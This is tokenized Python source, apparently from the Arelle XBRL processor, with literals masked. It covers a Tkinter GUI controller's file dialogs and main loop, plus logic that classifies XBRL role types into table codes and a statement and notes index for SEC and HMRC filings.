<EOL> if multiple and action == "<STR_LIT>" : <EOL> multFileNames = tkinter . filedialog . askopenfilename ( <EOL> multiple = True , <EOL> title = title , <EOL> initialdir = initialdir , <EOL> filetypes = [ ] if self . isMac else filetypes , <EOL> defaultextension = defaultextension , <EOL> parent = parent ) <EOL> if self . isMac : <EOL> return multFileNames <EOL> return re . findall ( "<STR_LIT>" , <EOL> multFileNames ) <EOL> elif self . hasWin32gui : <EOL> import win32gui <EOL> try : <EOL> filename , filter , flags = { "<STR_LIT>" : win32gui . GetOpenFileNameW , <EOL> "<STR_LIT>" : win32gui . GetSaveFileNameW } [ action ] ( <EOL> hwndOwner = ( owner if owner else parent ) . winfo_id ( ) , <EOL> hInstance = win32gui . GetModuleHandle ( None ) , <EOL> Filter = '<STR_LIT>' . join ( e for t in filetypes + [ '<STR_LIT>' ] for e in t ) , <EOL> MaxFile = <NUM_LIT> , <EOL> InitialDir = initialdir , <EOL> Title = title , <EOL> DefExt = defaultextension ) <EOL> return filename <EOL> except win32gui . error : <EOL> return '<STR_LIT>' <EOL> else : <EOL> return { "<STR_LIT>" : tkinter . filedialog . askopenfilename , <EOL> "<STR_LIT>" : tkinter . filedialog . asksaveasfilename } [ action ] ( <EOL> title = title , <EOL> initialdir = initialdir , <EOL> filetypes = [ ] if self . isMac else filetypes , <EOL> defaultextension = defaultextension , <EOL> parent = parent ) <EOL> from arelle import DialogFormulaParameters <EOL> class WinMainLogHandler ( logging . Handler ) : <EOL> def __init__ ( self , cntlr ) : <EOL> super ( WinMainLogHandler , self ) . __init__ ( ) <EOL> self . cntlr = cntlr <EOL> formatter = Cntlr . LogFormatter ( "<STR_LIT>" ) <EOL> self . setFormatter ( formatter ) <EOL> def flush ( self ) : <EOL> '''<STR_LIT>''' <EOL> def emit ( self , logRecord ) : <EOL> msg = self . format ( logRecord ) <EOL> try : <EOL> self . cntlr . addToLog ( msg , level = logRecord . levelno ) <EOL> except : <EOL> pass <EOL> class TkinterCallWrapper : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , func , subst , widget ) : <EOL> """<STR_LIT>""" <EOL> self . func = func <EOL> self . subst = subst <EOL> self . widget = widget <EOL> def __call__ ( self , * args ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> if self . subst : <EOL> args = self . subst ( * args ) <EOL> return self . func ( * args ) <EOL> except SystemExit as msg : <EOL> raise SystemExit ( msg ) <EOL> except Exception : <EOL> exc_type , exc_value , exc_traceback = sys . exc_info ( ) <EOL> msg = '<STR_LIT>' . join ( traceback . format_exception_only ( exc_type , exc_value ) ) <EOL> tracebk = '<STR_LIT>' . join ( traceback . format_tb ( exc_traceback , limit = <NUM_LIT:7> ) ) <EOL> tkinter . messagebox . showerror ( _ ( "<STR_LIT>" ) , <EOL> _ ( "<STR_LIT>" ) . format ( msg , tracebk ) ) <EOL> def main ( ) : <EOL> global restartMain <EOL> while restartMain : <EOL> restartMain = False <EOL> application = Tk ( ) <EOL> cntlrWinMain = CntlrWinMain ( application ) <EOL> application . protocol ( "<STR_LIT>" , cntlrWinMain . quit ) <EOL> if sys . platform == "<STR_LIT>" and not __file__ . endswith ( "<STR_LIT>" ) : <EOL> application . lift ( ) <EOL> application . call ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:.>' , '<STR_LIT>' , True ) <EOL> cntlrWinMain . uiThreadQueue . put ( ( application . call , [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:.>' , '<STR_LIT>' , False ] ) ) <EOL> os . system ( '''<STR_LIT>''' ) <EOL> application . mainloop ( ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> if os . getenv ( "<STR_LIT>" ) : <EOL> from arelle import CntlrCmdLine <EOL> CntlrCmdLine . main ( ) <EOL> else : <EOL> main ( ) </s>
<s> '''<STR_LIT>''' <EOL> try : <EOL> import regex as re <EOL> except ImportError : <EOL> import re <EOL> from collections import defaultdict <EOL> import os , io , json <EOL> from datetime import datetime , timedelta <EOL> from arelle import XbrlConst <EOL> from arelle . ModelDtsObject import ModelConcept <EOL> STMT = r"<STR_LIT>" <EOL> notDET = r"<STR_LIT>" <EOL> notCMPRH = r"<STR_LIT>" <EOL> isCMPRH = r"<STR_LIT>" <EOL> '''<STR_LIT>''' <EOL> rePARENTHETICAL = r"<STR_LIT>" <EOL> notPAR = "<STR_LIT>" + rePARENTHETICAL + "<STR_LIT:)>" <EOL> isPAR = "<STR_LIT>" + rePARENTHETICAL + "<STR_LIT:)>" <EOL> UGT_TOPICS = None <EOL> def RE ( * args ) : <EOL> return re . compile ( '<STR_LIT>' . join ( args ) , re . IGNORECASE ) <EOL> EFMtableCodes = [ <EOL> ( "<STR_LIT>" , RE ( STMT , notDET , notPAR ) , ( "<STR_LIT>" , ) ) , <EOL> ( "<STR_LIT>" , RE ( STMT , notDET , isPAR ) , ( "<STR_LIT>" , ) ) , <EOL> ( "<STR_LIT>" , RE ( STMT , notDET , notPAR ) , ( "<STR_LIT>" , ) ) , <EOL> ( "<STR_LIT>" , RE ( STMT , notDET , isPAR ) , ( "<STR_LIT>" , ) ) , <EOL> ( "<STR_LIT>" , RE ( STMT , notDET , notPAR ) , ( "<STR_LIT>" , ) ) , <EOL> ( "<STR_LIT>" , RE ( STMT , notDET , isPAR ) , ( "<STR_LIT>" , ) ) , <EOL> ( "<STR_LIT>" , RE ( STMT , notDET , notPAR ) , ( "<STR_LIT>" , "<STR_LIT>" ) ) , <EOL> ( "<STR_LIT>" , RE ( STMT , notDET , isPAR ) , ( "<STR_LIT>" , "<STR_LIT>" ) ) , <EOL> ( "<STR_LIT>" , RE ( STMT , notDET , notPAR ) , ( "<STR_LIT>" , ) ) , <EOL> ( "<STR_LIT>" , RE ( STMT , notDET , isPAR ) , ( "<STR_LIT>" , ) ) , <EOL> ( "<STR_LIT>" , RE ( STMT , notDET , notPAR ) , ( "<STR_LIT>" , ) ) , <EOL> ( "<STR_LIT>" , RE ( STMT , notDET , isPAR ) , ( "<STR_LIT>" , ) ) , <EOL> ( "<STR_LIT>" , RE ( STMT , notDET , notPAR ) , ( "<STR_LIT>" , ) ) , <EOL> ( "<STR_LIT>" , RE ( STMT , notDET , isPAR ) , ( "<STR_LIT>" , ) ) , <EOL> ( "<STR_LIT>" , RE ( r"<STR_LIT>" ) , None ) , <EOL> ( "<STR_LIT>" , RE ( STMT , notDET , notPAR , r"<STR_LIT>" ) , None ) , <EOL> ( "<STR_LIT>" , RE ( STMT , notDET , isPAR , r"<STR_LIT>" ) , None ) , <EOL> ( "<STR_LIT>" , RE ( STMT , notDET , notPAR , r"<STR_LIT>" ) , None ) , <EOL> ( "<STR_LIT>" , RE ( STMT , notDET , notPAR , notCMPRH , r"<STR_LIT>" ) , None ) , <EOL> ( "<STR_LIT>" , RE ( STMT , notDET , isPAR , notCMPRH , r"<STR_LIT>" ) , None ) , <EOL> ( "<STR_LIT>" , RE ( STMT , notDET , notPAR , isCMPRH , r"<STR_LIT>" ) , None ) , <EOL> ( "<STR_LIT>" , RE ( STMT , notDET , isPAR , isCMPRH , r"<STR_LIT>" ) , None ) , <EOL> ( "<STR_LIT>" , RE ( STMT , notDET , notPAR , r"<STR_LIT>" ) , None ) , <EOL> ( "<STR_LIT>" , RE ( STMT , notDET , isPAR , r"<STR_LIT>" ) , None ) , <EOL> ( "<STR_LIT>" , RE ( STMT , notDET , notPAR , r"<STR_LIT>" ) , None ) , <EOL> ( "<STR_LIT>" , RE ( STMT , notDET , isPAR , r"<STR_LIT>" ) , None ) , <EOL> ( "<STR_LIT>" , RE ( STMT , notDET , notPAR , r"<STR_LIT>" ) , None ) , <EOL> ( "<STR_LIT>" , RE ( STMT , notDET , notPAR , r"<STR_LIT>" ) , None ) , <EOL> ( "<STR_LIT>" , RE ( STMT , notDET , isPAR , r"<STR_LIT>" ) , None ) , <EOL> ( "<STR_LIT>" , RE ( STMT , notDET , isPAR , r"<STR_LIT>" ) , None ) , <EOL> ( "<STR_LIT>" , RE ( STMT , notDET , notPAR , r"<STR_LIT>" ) , None ) , <EOL> ( "<STR_LIT>" , RE ( STMT , notDET , isPAR , r"<STR_LIT>" ) , None ) , <EOL> ( "<STR_LIT>" , RE ( STMT , notDET , notPAR , r"<STR_LIT>" ) , None ) , <EOL> ( "<STR_LIT>" , RE ( STMT , notDET , isPAR , r"<STR_LIT>" ) , None ) , <EOL> ( "<STR_LIT>" , RE ( STMT , notDET , notPAR , r"<STR_LIT>" ) , None ) , <EOL> ( "<STR_LIT>" , RE ( STMT , notDET , notPAR , r"<STR_LIT>" ) , None ) , <EOL> ( "<STR_LIT>" , RE ( STMT , notDET , isPAR , r"<STR_LIT>" ) , None ) , <EOL> ( "<STR_LIT>" , RE ( STMT , notDET , notPAR , r"<STR_LIT>" ) , None ) , <EOL> ( "<STR_LIT>" , RE ( STMT , notDET , notPAR , r"<STR_LIT>" ) , None ) , <EOL> ( "<STR_LIT>" , RE ( STMT , notDET , isPAR , r"<STR_LIT>" ) , None ) , <EOL> ( "<STR_LIT>" , RE ( STMT , notDET , notPAR , r"<STR_LIT>" ) , None ) , <EOL> ( "<STR_LIT>" , RE ( STMT , notDET , notPAR , r"<STR_LIT>" ) , None ) , <EOL> ( "<STR_LIT>" , RE ( STMT , notDET , notPAR , r"<STR_LIT>" ) , None ) , <EOL> ( "<STR_LIT>" , RE ( STMT , notDET , notPAR , r"<STR_LIT>" ) , None ) , <EOL> ( "<STR_LIT>" , RE ( STMT , notDET , isPAR , r"<STR_LIT>" ) , None ) , <EOL> ( "<STR_LIT>" , RE ( STMT , notDET , notPAR , r"<STR_LIT>" ) , None ) , <EOL> ( "<STR_LIT>" , RE ( STMT , notDET , isPAR , r"<STR_LIT>" ) , None ) , <EOL> ( "<STR_LIT>" , RE ( STMT , notDET , notPAR , r"<STR_LIT>" ) , None ) , <EOL> ( "<STR_LIT>" , RE ( STMT , notDET , isPAR , r"<STR_LIT>" ) , None ) , <EOL> ( "<STR_LIT>" , RE ( STMT , notDET , notPAR , r"<STR_LIT>" ) , None ) , <EOL> ( "<STR_LIT>" , RE ( STMT , notDET , isPAR , r"<STR_LIT>" ) , None ) , <EOL> ( "<STR_LIT>" , RE ( STMT , notDET , notPAR , r"<STR_LIT>" ) , None ) , <EOL> ( "<STR_LIT>" , RE ( STMT , notDET , isPAR , r"<STR_LIT>" ) , None ) , <EOL> ( "<STR_LIT>" , RE ( STMT , notDET , notPAR , r"<STR_LIT>" ) , None ) , <EOL> ( "<STR_LIT>" , RE ( STMT , notDET , notPAR , r"<STR_LIT>" ) , None ) , <EOL> ( "<STR_LIT>" , RE ( STMT , notDET , isPAR , r"<STR_LIT>" ) , None ) <EOL> ] <EOL> HMRCtableCodes = [ <EOL> ( "<STR_LIT>" , RE ( r"<STR_LIT>" ) , None ) , <EOL> ( "<STR_LIT>" , RE ( r"<STR_LIT>" ) , None ) , <EOL> ( "<STR_LIT>" , RE ( r"<STR_LIT>" ) , None ) , <EOL> ( "<STR_LIT>" , RE ( r"<STR_LIT>" ) , None ) , <EOL> ( "<STR_LIT>" , RE ( r"<STR_LIT>" ) , None ) , <EOL> ] <EOL> def evaluateRoleTypesTableCodes ( modelXbrl ) : <EOL> disclosureSystem = modelXbrl . modelManager . disclosureSystem <EOL> if disclosureSystem . validationType in ( "<STR_LIT>" , "<STR_LIT>" ) : <EOL> detectMultipleOfCode = False <EOL> if disclosureSystem . validationType == "<STR_LIT>" : <EOL> tableCodes = list ( EFMtableCodes ) <EOL> detectMultipleOfCode = any ( v and any ( v . startswith ( dt ) for dt in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> for docTypeConcept in modelXbrl . nameConcepts . get ( '<STR_LIT>' , ( ) ) <EOL> for docTypeFact in modelXbrl . factsByQname . get ( docTypeConcept . qname , ( ) ) <EOL> for v in ( docTypeFact . value , ) ) <EOL> elif disclosureSystem . validationType == "<STR_LIT>" : <EOL> tableCodes = list ( HMRCtableCodes ) <EOL> codeRoleURI = { } <EOL> roleURICode = { } <EOL> roleTypes = [ roleType <EOL> for roleURI in modelXbrl . relationshipSet ( XbrlConst . parentChild ) . linkRoleUris <EOL> for roleType in modelXbrl . roleTypes . get ( roleURI , ( ) ) ] <EOL> roleTypes . sort ( key = lambda roleType : roleType . definition ) <EOL> for roleType in roleTypes : <EOL> definition = roleType . definition <EOL> rootConcepts = None <EOL> for i , tableCode in enumerate ( tableCodes ) : <EOL> code , pattern , rootConceptNames = tableCode <EOL> if ( detectMultipleOfCode or code not in codeRoleURI ) and pattern . match ( definition ) : <EOL> if rootConceptNames and rootConcepts is None : <EOL> rootConcepts = modelXbrl . relationshipSet ( XbrlConst . parentChild , roleType . roleURI ) . rootConcepts <EOL> if ( not rootConceptNames or <EOL> any ( rootConcept . name in rootConceptNames for rootConcept in rootConcepts ) ) : <EOL> codeRoleURI [ code ] = roleType . roleURI <EOL> roleURICode [ roleType . roleURI ] = code <EOL> if not detectMultipleOfCode : <EOL> del tableCodes [ i ] <EOL> break <EOL> for roleTypes in modelXbrl . roleTypes . values ( ) : <EOL> for roleType in roleTypes : <EOL> roleType . _tableCode = roleURICode . get ( roleType . roleURI ) <EOL> else : <EOL> for roleTypes in modelXbrl . roleTypes . values ( ) : <EOL> for roleType in roleTypes : <EOL> roleType . _tableCode = None <EOL> def evaluateTableIndex ( modelXbrl ) : <EOL> disclosureSystem = modelXbrl . modelManager . disclosureSystem <EOL> if disclosureSystem . validationType == "<STR_LIT>" : <EOL> COVER = "<STR_LIT>" <EOL> STMTS = "<STR_LIT>" <EOL> NOTES = "<STR_LIT>" <EOL> POLICIES = "<STR_LIT>" <EOL> TABLES = "<STR_LIT>" <EOL> DETAILS = "<STR_LIT>" <EOL> UNCATEG = "<STR_LIT>" <EOL> roleDefinitionPattern = re . compile ( r"<STR_LIT>" ) <EOL> definitionElrs = dict ( ( roleType . definition , roleType ) <EOL> for roleURI in modelXbrl . relationshipSet ( XbrlConst . parentChild ) . linkRoleUris <EOL> for roleType in modelXbrl . roleTypes . get ( roleURI , ( ) ) ) <EOL> isRR = any ( ns . startswith ( "<STR_LIT>" ) for ns in modelXbrl . namespaceDocs . keys ( ) if ns ) <EOL> tableGroup = None <EOL> firstTableLinkroleURI = None <EOL> firstDocumentLinkroleURI = None <EOL> sortedRoleTypes = sorted ( definitionElrs . items ( ) , key = lambda item : item [ <NUM_LIT:0> ] ) <EOL> for roleDefinition , roleType in sortedRoleTypes : <EOL> roleType . _tableChildren = [ ] <EOL> match = roleDefinitionPattern . match ( roleDefinition ) if roleDefinition else None <EOL> if not match : <EOL> roleType . _tableIndex = ( UNCATEG , "<STR_LIT>" , roleType . roleURI ) <EOL> continue <EOL> seq , tblType , tblName = match . groups ( ) <EOL> if isRR : <EOL> tableGroup = COVER <EOL> elif not tableGroup : <EOL> tableGroup = ( "<STR_LIT>" in tblName and COVER or tblType == "<STR_LIT>" and STMTS or <EOL> "<STR_LIT>" in tblName and NOTES or "<STR_LIT>" in tblName and TABLES or <EOL> "<STR_LIT>" in tblName and DETAILS or COVER ) <EOL> elif tableGroup == COVER : <EOL> tableGroup = ( tblType == "<STR_LIT>" and STMTS or "<STR_LIT>" in tblName and COVER or <EOL> "<STR_LIT>" in tblName and NOTES or "<STR_LIT>" in tblName and TABLES or <EOL> "<STR_LIT>" in tblName and DETAILS or NOTES ) <EOL> elif tableGroup == STMTS : <EOL> tableGroup = ( ( tblType == "<STR_LIT>" or "<STR_LIT>" in tblName ) and STMTS or <EOL> "<STR_LIT>" in tblName and NOTES or "<STR_LIT>" in tblName and TABLES or <EOL> "<STR_LIT>" in tblName and DETAILS or NOTES ) <EOL> elif tableGroup == NOTES : <EOL> tableGroup = ( "<STR_LIT>" in tblName and POLICIES or "<STR_LIT>" in tblName and TABLES or <EOL> "<STR_LIT>" in tblName and DETAILS or tblType == "<STR_LIT>" and NOTES or UNCATEG ) <EOL> elif tableGroup == POLICIES : <EOL> tableGroup = ( "<STR_LIT>" in tblName and TABLES or "<STR_LIT>" in tblName and DETAILS or <EOL> ( "<STR_LIT>" in tblName or "<STR_LIT>" in tblName ) and POLICIES or UNCATEG ) <EOL> elif tableGroup == TABLES : <EOL> tableGroup = ( "<STR_LIT>" in tblName and DETAILS or <EOL> ( "<STR_LIT>" in tblName or "<STR_LIT>" in tblName ) and TABLES or UNCATEG ) <EOL> elif tableGroup == DETAILS : <EOL> tableGroup = ( ( "<STR_LIT>" in tblName or "<STR_LIT>" in tblName ) and DETAILS or UNCATEG ) <EOL> else : <EOL> tableGroup = UNCATEG <EOL> if firstTableLinkroleURI is None and tableGroup == COVER : <EOL> firstTableLinkroleURI = roleType . roleURI <EOL> if tblType == "<STR_LIT>" and not firstDocumentLinkroleURI : <EOL> firstDocumentLinkroleURI = roleType . roleURI <EOL> roleType . _tableIndex = ( tableGroup , seq , tblName ) <EOL> if not modelXbrl . qnameDimensionDefaults : <EOL> from arelle import ValidateXbrlDimensions <EOL> ValidateXbrlDimensions . loadDimensionDefaults ( modelXbrl ) <EOL> reportedFacts = set ( ) <EOL> factsByQname = modelXbrl . factsByQname <EOL> reportingPeriods = set ( ) <EOL> nextEnd = None <EOL> deiFact = { } <EOL> for conceptName in ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) : <EOL> for concept in modelXbrl . nameConcepts [ conceptName ] : <EOL> for fact in factsByQname [ concept . qname ] : <EOL> deiFact [ conceptName ] = fact <EOL> if fact . context is not None : <EOL> reportingPeriods . add ( ( None , fact . context . endDatetime ) ) <EOL> reportingPeriods . add ( ( fact . context . startDatetime , fact . context . endDatetime ) ) <EOL> nextEnd = fact . context . startDatetime <EOL> duration = ( fact . context . endDatetime - fact . context . startDatetime ) . days + <NUM_LIT:1> <EOL> break <EOL> if "<STR_LIT>" in deiFact : <EOL> fact = deiFact [ "<STR_LIT>" ] <EOL> if "<STR_LIT>" in fact . xValue : <EOL> endDatetime = fact . context . endDatetime <EOL> endDatetimeMonth = endDatetime . month <EOL> if ( endDatetime + timedelta ( <NUM_LIT:2> ) ) . month != endDatetimeMonth : <EOL> endOfMonth = True <EOL> while endDatetime . month == endDatetimeMonth : <EOL> endDatetime += timedelta ( <NUM_LIT:1> ) <EOL> else : <EOL> endOfMonth = False <EOL> startYr = endDatetime . year <EOL> startMo = endDatetime . month - <NUM_LIT:3> <EOL> if startMo <= <NUM_LIT:0> : <EOL> startMo += <NUM_LIT:12> <EOL> startYr -= <NUM_LIT:1> <EOL> startDatetime = datetime ( startYr , startMo , endDatetime . day , endDatetime . hour , endDatetime . minute , endDatetime . second ) <EOL> if endOfMonth : <EOL> startDatetime -= timedelta ( <NUM_LIT:1> ) <EOL> endDatetime -= timedelta ( <NUM_LIT:1> ) <EOL> reportingPeriods . add ( ( startDatetime , endDatetime ) ) <EOL> duration = <NUM_LIT> <EOL> while ( nextEnd is not None ) : <EOL> thisEnd = nextEnd <EOL> prevMaxStart = thisEnd - timedelta ( duration * <NUM_LIT> ) <EOL> prevMinStart = thisEnd - timedelta ( duration * <NUM_LIT> ) <EOL> nextEnd = None <EOL> for cntx in modelXbrl . contexts . values ( ) : <EOL> if ( cntx . isStartEndPeriod and not cntx . qnameDims and thisEnd == cntx . endDatetime and <EOL> prevMinStart <= cntx . startDatetime <= prevMaxStart ) : <EOL> reportingPeriods . add ( ( None , cntx . endDatetime ) ) <EOL> reportingPeriods . add ( ( cntx . startDatetime , cntx . endDatetime ) ) <EOL> nextEnd = cntx . startDatetime <EOL> break <EOL> elif ( cntx . isInstantPeriod and not cntx . qnameDims and thisEnd == cntx . endDatetime ) : <EOL> reportingPeriods . add ( ( None , cntx . endDatetime ) ) <EOL> stmtReportingPeriods = set ( reportingPeriods ) <EOL> sortedRoleTypes . reverse ( ) <EOL> for i , roleTypes in enumerate ( sortedRoleTypes ) : <EOL> roleDefinition , roleType = roleTypes <EOL> tableFacts = set ( ) <EOL> tableGroup , tableSeq , tableName = roleType . _tableIndex <EOL> roleURIdims , priItemQNames = EFMlinkRoleURIstructure ( modelXbrl , roleType . roleURI ) <EOL> for priItemQName in priItemQNames : <EOL> for fact in factsByQname [ priItemQName ] : <EOL> cntx = fact . context <EOL> if ( cntx is not None and <EOL> all ( dimQn in modelXbrl . qnameDimensionDefaults <EOL> for dimQn in ( roleURIdims . keys ( ) - cntx . qnameDims . keys ( ) ) ) and <EOL> all ( mdlDim . memberQname in roleURIdims [ dimQn ] <EOL> for dimQn , mdlDim in cntx . qnameDims . items ( ) <EOL> if dimQn in roleURIdims ) ) : <EOL> cntxStartDatetime = cntx . startDatetime <EOL> cntxEndDatetime = cntx . endDatetime <EOL> if ( tableGroup != STMTS or <EOL> ( cntxStartDatetime , cntxEndDatetime ) in stmtReportingPeriods and <EOL> ( fact not in reportedFacts or <EOL> all ( dimQn not in cntx . qnameDims <EOL> for dimQn in ( cntx . qnameDims . keys ( ) - roleURIdims . keys ( ) ) ) ) ) : <EOL> tableFacts . add ( fact ) <EOL> reportedFacts . add ( fact ) <EOL> roleType . _tableFacts = tableFacts <EOL> closestParentType = None <EOL> closestParentMatchLength = <NUM_LIT:0> <EOL> for _parentRoleDefinition , parentRoleType in sortedRoleTypes [ i + <NUM_LIT:1> : ] : <EOL> matchLen = parentNameMatchLen ( tableName , parentRoleType ) <EOL> if matchLen > closestParentMatchLength : <EOL> closestParentMatchLength = matchLen <EOL> closestParentType = parentRoleType <EOL> if closestParentType is not None : <EOL> closestParentType . _tableChildren . insert ( <NUM_LIT:0> , roleType ) <EOL> unmatchedChildRoles = set ( ) <EOL> longestChildMatchLen = <NUM_LIT:0> <EOL> numChildren = <NUM_LIT:0> <EOL> for childRoleType in roleType . _tableChildren : <EOL> matchLen = parentNameMatchLen ( tableName , childRoleType ) <EOL> if matchLen < closestParentMatchLength : <EOL> unmatchedChildRoles . add ( childRoleType ) <EOL> elif matchLen > longestChildMatchLen : <EOL> longestChildMatchLen = matchLen <EOL> numChildren += <NUM_LIT:1> <EOL> if numChildren > <NUM_LIT:1> : <EOL> for childRoleType in roleType . _tableChildren : <EOL> if ( childRoleType not in unmatchedChildRoles and <EOL> parentNameMatchLen ( tableName , childRoleType ) < longestChildMatchLen ) : <EOL> unmatchedChildRoles . add ( childRoleType ) <EOL> for unmatchedChildRole in unmatchedChildRoles : <EOL> roleType . _tableChildren . remove ( unmatchedChildRole ) <EOL> for childRoleType in roleType . _tableChildren : <EOL> childRoleType . _tableParent = roleType <EOL> unmatchedChildRoles = None <EOL> global UGT_TOPICS <EOL> if UGT_TOPICS is None : <EOL> try : <EOL> from arelle import FileSource <EOL> fh = FileSource . openFileStream ( modelXbrl . modelManager . cntlr , <EOL> os . path . join ( modelXbrl . modelManager . cntlr . configDir , "<STR_LIT>" ) , <EOL> '<STR_LIT:r>' , '<STR_LIT:utf-8>' ) <EOL> UGT_TOPICS = json . load ( fh ) <EOL> fh . close ( ) <EOL> for topic in UGT_TOPICS : <EOL> topic [ <NUM_LIT:6> ] = set ( topic [ <NUM_LIT:6> ] ) <EOL> topic [ <NUM_LIT:7> ] = set ( topic [ <NUM_LIT:7> ] ) <EOL> topic [ <NUM_LIT:8> ] = set ( topic [ <NUM_LIT:8> ] ) <EOL> except Exception as ex : <EOL> UGT_TOPICS = None <EOL> if UGT_TOPICS is not None : <EOL> def roleUgtConcepts ( roleType ) : <EOL> roleConcepts = set ( ) <EOL> for rel in modelXbrl . relationshipSet ( XbrlConst . parentChild , roleType . roleURI ) . modelRelationships : <EOL> if rel . toModelObject is not None : <EOL> roleConcepts . add ( rel . toModelObject . name ) <EOL> if rel . fromModelObject is not None : <EOL> roleConcepts . add ( rel . fromModelObject . name ) <EOL> if hasattr ( roleType , "<STR_LIT>" ) : <EOL> for _tableChild in roleType . _tableChildren : <EOL> roleConcepts |= roleUgtConcepts ( _tableChild ) <EOL> return roleConcepts <EOL> topicMatches = { } <EOL> for roleDefinition , roleType in sortedRoleTypes : <EOL> roleTopicType = '<STR_LIT:S>' if roleDefinition . startswith ( '<STR_LIT:S>' ) else '<STR_LIT:D>' <EOL> if getattr ( roleType , "<STR_LIT>" , None ) is None : <EOL> concepts = roleUgtConcepts ( roleType ) <EOL> for i , ugtTopic in enumerate ( UGT_TOPICS ) : <EOL> if ugtTopic [ <NUM_LIT:0> ] == roleTopicType : <EOL> countAbstracts = len ( concepts & ugtTopic [ <NUM_LIT:6> ] ) <EOL> countTextBlocks = len ( concepts & ugtTopic [ <NUM_LIT:7> ] ) <EOL> countLineItems = len ( concepts & ugtTopic [ <NUM_LIT:8> ] ) <EOL> if countAbstracts or countTextBlocks or countLineItems : <EOL> _score = ( <NUM_LIT:10> * countAbstracts + <EOL> <NUM_LIT:1000> * countTextBlocks + <EOL> countLineItems / len ( concepts ) ) <EOL> if i not in topicMatches or _score > topicMatches [ i ] [ <NUM_LIT:0> ] : <EOL> topicMatches [ i ] = ( _score , roleType ) <EOL> for topicNum , scoredRoleType in topicMatches . items ( ) : <EOL> _score , roleType = scoredRoleType <EOL> if _score > getattr ( roleType , "<STR_LIT>" , <NUM_LIT:0> ) : <EOL> ugtTopic = UGT_TOPICS [ topicNum ] <EOL> roleType . _tableTopicScore = _score <EOL> roleType . _tableTopicType = ugtTopic [ <NUM_LIT:0> ] <EOL> roleType . _tableTopicName = ugtTopic [ <NUM_LIT:3> ] <EOL> roleType . _tableTopicCode = ugtTopic [ <NUM_LIT:4> ] <EOL> return ( firstTableLinkroleURI or firstDocumentLinkroleURI ) , None <EOL> elif "<STR_LIT>" in modelXbrl . modelManager . disclosureSystem . names : <EOL> roleElrs = dict ( ( roleURI , roleType ) <EOL> for roleURI in modelXbrl . relationshipSet ( XbrlConst . parentChild ) . linkRoleUris <EOL> for roleType in modelXbrl . roleTypes . get ( roleURI , ( ) ) ) <EOL> roleIdentifierItems = { } <EOL> for roleURI , roleType in roleElrs . items ( ) : <EOL> roleType . _tableChildren = [ ] <EOL> relSet = modelXbrl . relationshipSet ( XbrlConst . parentChild , roleURI ) <EOL> for rootConcept in relSet . rootConcepts : <EOL> if rootConcept . substitutionGroupQname and rootConcept . substitutionGroupQname . localName == "<STR_LIT>" : <EOL> roleIdentifierItems [ rootConcept ] = roleType <EOL> linkroleUri = None <EOL> for roleURI , roleType in roleElrs . items ( ) : <EOL> relSet = modelXbrl . relationshipSet ( XbrlConst . parentChild , roleURI ) <EOL> def addRoleIdentifiers ( fromConcept , parentRoleType , visited ) : <EOL> for rel in relSet . fromModelObject ( fromConcept ) : <EOL> _fromConcept = rel . fromModelObject <EOL> _toConcept = rel . toModelObject <EOL> if isinstance ( _fromConcept , ModelConcept ) and isinstance ( _toConcept , ModelConcept ) : <EOL> _fromSubQn = _fromConcept . substitutionGroupQname <EOL> _toSubQn = _toConcept . substitutionGroupQname <EOL> if ( ( parentRoleType is not None or <EOL> ( _fromSubQn and _fromSubQn . localName == "<STR_LIT>" and _fromConcept in roleIdentifierItems ) ) and <EOL> _toSubQn and _toSubQn . localName == "<STR_LIT>" and <EOL> _toConcept in roleIdentifierItems ) : <EOL> if parentRoleType is None : <EOL> parentRoleType = roleIdentifierItems [ _fromConcept ] <EOL> _toRoleType = roleIdentifierItems [ _toConcept ] <EOL> if _toConcept not in parentRoleType . _tableChildren : <EOL> parentRoleType . _tableChildren . append ( _toRoleType ) <EOL> if _toConcept not in visited : <EOL> visited . add ( _toConcept ) <EOL> addRoleIdentifiers ( _toConcept , _toRoleType , visited ) <EOL> visited . discard ( _toConcept ) <EOL> elif _toConcept not in visited : <EOL> visited . add ( _toConcept ) <EOL> addRoleIdentifiers ( _toConcept , parentRoleType , visited ) <EOL> visited . discard ( _toConcept ) <EOL> for rootConcept in relSet . rootConcepts : <EOL> addRoleIdentifiers ( rootConcept , None , set ( ) ) <EOL> if not linkroleUri and len ( roleType . _tableChildren ) > <NUM_LIT:0> : <EOL> linkroleUri = roleURI <EOL> return linkroleUri , linkroleUri <EOL> return None , None <EOL> def parentNameMatchLen ( tableName , parentRoleType ) : <EOL> lengthOfMatch = <NUM_LIT:0> <EOL> parentName = parentRoleType . _tableIndex [ <NUM_LIT:2> ] <EOL> parentNameLen = len ( parentName . partition ( '<STR_LIT:(>' ) [ <NUM_LIT:0> ] ) <EOL> fullWordFound = False <EOL> for c in tableName . partition ( '<STR_LIT:(>' ) [ <NUM_LIT:0> ] : <EOL> fullWordFound |= c . isspace ( ) <EOL> if lengthOfMatch >= parentNameLen or c != parentName [ lengthOfMatch ] : <EOL> break <EOL> lengthOfMatch += <NUM_LIT:1> <EOL> return fullWordFound and lengthOfMatch <EOL> def EFMlinkRoleURIstructure ( modelXbrl , roleURI ) : <EOL> relSet = modelXbrl . relationshipSet ( XbrlConst . parentChild , roleURI ) <EOL> dimMems = { } <EOL> priItems = set ( ) <EOL> for rootConcept in relSet . rootConcepts : <EOL> EFMlinkRoleDescendants ( relSet , rootConcept , dimMems , priItems ) <EOL> return dimMems , priItems <EOL> def EFMlinkRoleDescendants ( relSet , concept , dimMems , priItems ) : <EOL> if concept is not None : <EOL> if concept . isDimensionItem : <EOL> dimMems [ concept . qname ] = EFMdimMems ( relSet , concept , set ( ) ) <EOL> else : <EOL> if not concept . isAbstract : <EOL> priItems . add ( concept . qname ) <EOL> for rel in relSet . fromModelObject ( concept ) : <EOL> EFMlinkRoleDescendants ( relSet , rel . toModelObject , dimMems , priItems ) <EOL> def EFMdimMems ( relSet , concept , memQNames ) : <EOL> for rel in relSet . fromModelObject ( concept ) : <EOL> dimConcept = rel . toModelObject <EOL> if isinstance ( dimConcept , ModelConcept ) and dimConcept . isDomainMember : <EOL> memQNames . add ( dimConcept . qname ) <EOL> EFMdimMems ( relSet , dimConcept , memQNames ) <EOL> return 